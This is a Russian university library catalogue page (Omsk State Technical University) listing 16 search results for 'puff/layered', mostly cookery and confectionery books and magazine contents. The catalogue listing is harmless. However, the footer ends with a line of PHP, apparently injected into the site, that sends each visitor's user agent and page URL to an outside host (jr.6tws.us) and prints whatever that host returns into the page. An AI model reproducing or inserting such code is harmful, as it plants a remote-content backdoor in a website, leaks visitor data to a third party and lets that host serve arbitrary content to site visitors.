Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

313 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СЛОЕНОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 16
1. 
Химия и жизнь - XXI век. - Журнал, 2005г. № 8
Оглавление 
  • Бедный Йорик, или Лекарства в нашей жизни. - с.4-5
  • Климат регулируется водой. - с.5
  • Свойства водяного клубка. - с.5-6
  • Съедобная прививка. - с.6-7
  • СО [2] на радость свекле. - с.7
  • Нейроны объединяют клетки. - с.7
  • Клещенко, Е. "Евроген": ученые, довольные жизнью / Е. Клещенко. - с.8-13
  • Черепащук, А. М. Охота на черные дыры / А. М. Черепащук. - с.14-19
  • Рукотворные черные дыры. - с.18
  • Черные дыры растут вместе с галактиками. - с.18
  • Вселенная в маленьких черных дырах. - с.18
  • Еще одна черная дыра в нашей галактике?. - с.19
  • Черные дыры - космические термостаты. - с.19
  • Как обедает черная дыра. - с.19
  • Пурмаль, А. П. Слоеное небо / А. П. Пурмаль. - с.20-21
  • Флуоресцентные метки вместо наноточек. - с.22
  • Нанокабель для больного нерва. - с.22
  • Датчик в желудке. - с.22
  • Бета-батарейка. - с.22
  • Левитация платины. - с.23
  • Крыша вместо бензобака. - с.23
  • Электронная микроскопия - детям. - с.23
  • "Лежачий полицейский" в КПЗ. - с.23
  • Семиков, С. А. Как научить синтетику дышать / С. А. Семиков. - с.24-25
  • Стойлов, Ю. Ю. Фторорганика - инертный стимулятор? / Ю. Ю. Стойлов. - с.26-27
  • Корнилов, М. Ю. Азулиты / М. Ю. Корнилов. - с.28-30
  • Флячинская, Л. П. Не в мать, не в отца... / Л. П. Флячинская. - с.32-35
  • Крылов, А. В. Бобры меняют гидросферу / А. В. Крылов. - с.36-41
  • Мазуренко, М. Т. Тост во славу аджарских киви / М. Т. Мазуренко. - с.42-44
  • Резник, Н. Фамильные портреты российских регионов / Н. Резник. - с.45
  • [Физическая нагрузка для здоровья]. - с.46
  • [Борьба с малярийными комарами]. - с.46
  • [Питание обитателей морского дна]. - с.46
  • [Преодоление стресса тибетскими монахами]. - с.47
  • [Коллоидная суспензия для гибких нанопроводов]. - с.47
  • [Новое в обучении иностранному языку]. - с.47
  • [Из жизни синичек-гаечек]. - с.47
  • Гусаков, Г. Человек Земли / Г. Гусаков. - с.48-50
  • Рич, Валентин. Девять страниц из жизни "Химии и жизни" / В. Рич. - с.52-57
  • Смирнов, А. Р. Альберт Эйнштейн: поиск единства в природе и обществе / А. Р. Смирнов. - с.58-61
  • Все в мире относительно. - с.62
  • Алексеев, С. Мировой Год физики / С. Алексеев. - с.63
  • "Критическая масса" победила. - с.64-65
  • Болл, Ф. "Я ничего не знаю о культуре популяризации в России! " / Ф. Болл. - с.64-65
  • Гарридо, А. Бусики / А. Гарридо. - с.66-68
  • Пятосина, Н. О вкусе целого гриба / Н. Пятосина. - с.69
  • Егорова, М. Я знаю больше, чем помню? / М. Егорова. - с.70
  • Сутоцкая, Е. От работы полнеют / Е. Сутоцкая. - с.71
  • "Наука - Обществу - 2005". - с.72-73
  • Анофелес, С. Тау-китянские новости / С. Анофелес. - с.51
Держатели документа (Информация об экземплярах) 
2. 
Пирожные. Кремы. Глазури. Помадка [Текст] / дар. В. А. Козлова, 2000. - 78, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

4. 
Питание и общество. - Журнал, 2009г. № 10
Оглавление 
  • Курбанов, Н. Комбинированный белково-витаминный салат из огородного портулака / Н. Курбанов, Д. Аскерова. - с.24-25
    Кл. слова: САЛАТ, ПОРТУЛАК
  • Филонов, М. "Зерно пророка" подарило нам кефир / М. Филонов. - с.26-27
    Кл. слова: КЕФИР
  • Разнообразие теста. - с.27
    Кл. слова: ТЕСТО СЛОЕНОЕ, ТЕСТО ПЕСОЧНОЕ
  • Морозова, Т. Жиры-мутанты / Т. Морозова. - с.28
    Кл. слова: трансжиры
  • Остаться на бобах... Не так уж плохо!. - с.29
    Кл. слова: ФАСОЛЬ, БОБЫ
  • Мироевская, Н. В пивном ресторане - стиль особый / Н. Мироевская. - с.32-33
    Кл. слова: ОДЕЖДА обслуживающего персонала
5. 
Питание и общество. - Журнал, 2012г. № 1
Оглавление 
  • Номофилова, Н. Под флагом патриарха народной кухни Италии / Н. Номофилова. - с.4-5
  • Номофилова, Н. Каппеллетти по-романьольски / Н. Номофилова. - с.5
  • Самойлов, Юрий. Праздник плова в "Хиве" / Ю. Самойлов. - с.6-7
  • Дейниченко, Г. Сушка - новый способ переработки мяса мидий / Г. Дейниченко, Ю. Карнаушенко, А. Звегинцев. - с.10-11
  • Арефьева, Елена. Скажите "чиииз"! / Е. Арефьева. - с.11-12
  • Питание и наука. - с.13
  • Кучер, Л. Национальный этикет делового общения / Л. Кучер, Л. Шкуратова. - с.17
  • Слоеное тесто. - с.18
  • ... И еще о слоеном тесте. - с.19
  • Хлеб с цуккини. - с.19
  • Киреевский, И. Г. Миргород / И. Г. Киреевский. - с.20
  • Арефьева, Елена. Прованское масло / Е. Арефьева. - с.21
  • Рождественский обед. - с.22-23
  • Мешков, А. На ланч сегодня - смерреброль / А. Мешков. - с.24-25
  • Арефьева, Анастасия. Колбаса / А. Арефьева. - с.26-27
  • О петрушке курчавой. - с.28
  • Филонов, Михаил. По имени нимфы / М. Филонов. - с.28-29
6. 
Кондитерское и хлебопекарное производство. - Журнал, 2008г. № 1
Оглавление 
  • Использование соевого молока при производстве мучных изделий. - с.2-3
    Кл. слова: МОЛОКО СОЕВОЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Музыка, Л. А. Мягкие маргарины с длительным сроком годности для кулинарии и кондитерского производства / Л. А. Музыка. - с.4-6
    Кл. слова: МАРГАРИН
  • Тукачев, В. Е. Высокотемпературная сушка макаронных изделий / В. Е. Тукачев. - с.8-11
    Кл. слова: СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шамков, Ю. А. Проблемы качества зерновых смесей / Ю. А. Шамков. - с.12-14
    Кл. слова: ЗЕРНО
  • Конфеты ручной работы. - с.15-19
    Кл. слова: КОНФЕТЫ
  • Дубцов, Г. Г. Шафран: пряность известная и забытая / Г. Г. Дубцов. - с.20-21
    Кл. слова: ШАФРАН
  • Торт " Банановый". - с.22-23
    Кл. слова: ТОРТЫ
  • Производство изделий из слоеного теста. - с.24-26
    Кл. слова: ТЕСТО СЛОЕНОЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
Держатели документа (Информация об экземплярах) 
7. 
Вокруг света. - Журнал, 2004г. № 5
Оглавление 
  • Хранители памяти. - с.224
  • Ефимова, Валентина. Мистерия "Зеленого змия" / В. Ефимова. - с.214-220
  • Гримасы SAPS. - с.213
  • Федосеев, Семен. От сопок Маньчжурии до позиции "Зигфрид" / С. Федосеев. - с.200-209
  • Кто такой курилка?. - с.199
  • Что роднит сусальное золото и слоеное тесто?. - с.199
  • Какая рыба самая губастая?. - с.199
  • Лыскин, Александр. Затерянный мир / А. Лыскин. - с.184-194
  • д'Амико, Сузо Чекки. О кино, и не только / С. Ч. д'Амико. - с.176-182
  • Каков вкус победы?. - с.174
  • Для чего нужна серебряная соль?. - с.170
  • Где царит полный покой?. - с.170
  • Что такое волапюк?. - с.170
  • Музыкина, Ольга. Иной путь, или Чем могло закончиться Ледовое побоище / О. Музыкина. - с.154-168
  • Чем хорош сквош?. - с.152
  • Как устроено пространство иконы?. - с.152
  • Бочарова, Дарья. Тише едешь, дальше будешь / Д. Бочарова. - с.138-146
  • Почему кукушка плохая мать?. - с.132
  • Откуда взялась книга рекордов Гиннесса?. - с.132
  • Как сменялись правящие династии в Англии?. - с.130
  • Михайлова, Мария. Жизнь и смерть русской Менады / М. Михайлова. - с.121-128
  • Элькем, Жиль. Предательские льды / Ж. Элькем. - с.118
  • Иванов, Дмитрий. Посчитать всех / Д. Иванов. - с.104-116
  • Бронников, Кирилл. Мост между мирами / К. Бронников. - с.90-99
  • Новое ретро. - с.88
  • Золотой юбилей. - с.86
  • Ай да Пирожков!. - с.84-85
  • Фатющенко, Андрей. Поступь Бога / А. Фатющенко. - с.60-82
  • Май. - с.50-58
  • Голубовский, Анатолий. Краеведение по-имперски / А. Голубовский. - с.38-48
  • Травина, Ирина. Как живется белым воронам? / И. Травина. - с.12-20
Держатели документа (Информация об экземплярах) 
8. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
9. 
Сладкий сюрприз [Текст], 1998. - 333 с. [10] вкл. цв. л. с.
Держатели документа (Информация об экземплярах) 
10. 
Рецептуры для кондитера [Текст] : [Сб.] / Авт.-сост. В. Прохоров, 2003. - 316 с.
Держатели документа (Информация об экземплярах) 
11. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 
12. 
Татарская Л. Л. Лабораторно-практические работы для поваров и кондитеров [Текст] : учеб. пособ. для нач. проф. образования / Л. Л. Татарская, Н. А. Анфимова, 2004. - 108 с.
Держатели документа (Информация об экземплярах) 
13. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
14. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
15. 
Гришина Е. С. Технология кондитерских изделий [Текст] : учеб.-метод. пособие для студентов специальности 260501 "Технология продуктов питания" и по направлению подготовки бакалавров 260100 "Технология продуктов питания" / Е. С. Гришина, 2010. - 247 с.
Держатели документа (Информация об экземплярах) 
16. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2813 - 21.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.33 с.22 запросов, 1.45c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;